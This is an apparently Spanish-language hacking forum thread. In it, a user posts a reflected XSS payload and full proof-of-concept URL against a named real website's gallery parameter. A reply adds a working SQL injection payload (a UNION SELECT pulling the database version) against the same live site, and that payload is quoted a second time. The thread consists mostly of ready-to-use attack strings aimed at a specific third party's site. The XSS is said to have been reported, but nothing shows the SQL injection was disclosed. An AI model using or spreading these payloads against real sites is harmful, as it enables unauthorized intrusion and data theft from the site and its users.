Captura de pantalla
(https://i.imgur.com/ZSqRz1Y.png)
Url del sitio
- http://www.dynastybuilders.ca
Vector
- Archivo y Parametro: custom-gallery.php?id=
- Payload XSS: '"><script>alert(/Drok3r - XSS /)</script>
- PoC:
----> http://www.dynastybuilders.ca/custom-gallery.php?id=33%27%22%3E%3Cscript%3Ealert(/Drok3r%20-%20XSS%20/)%3C/script%3E (http://www.dynastybuilders.ca/custom-gallery.php?id=33%27%22%3E%3Cscript%3Ealert(/Drok3r%20-%20XSS%20/)%3C/script%3E)
Autor
[!] Drok3r (redbirdTEAM - CiberSecurityRECON)
Reportado: SI
¡Hola Drok3r!
Excelente XSS, pero te comento que la web también es vulnerable a SQLi, por si no lo has notado.
Payload: http://www.dynastybuilders.ca/custom-gallery.php?id=' union select 1,version(),3,4,5,6,7,8,9,10,11 -- -
¡Saludos!
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
¡Hola Drok3r!
Excelente XSS, pero te comento que la web también es vulnerable a SQLi, por si no lo has notado.
Payload: http://www.dynastybuilders.ca/custom-gallery.php?id=' union select 1,version(),3,4,5,6,7,8,9,10,11 -- -
¡Saludos!
Aaaa que cosas.... jeje Gracias por el dato.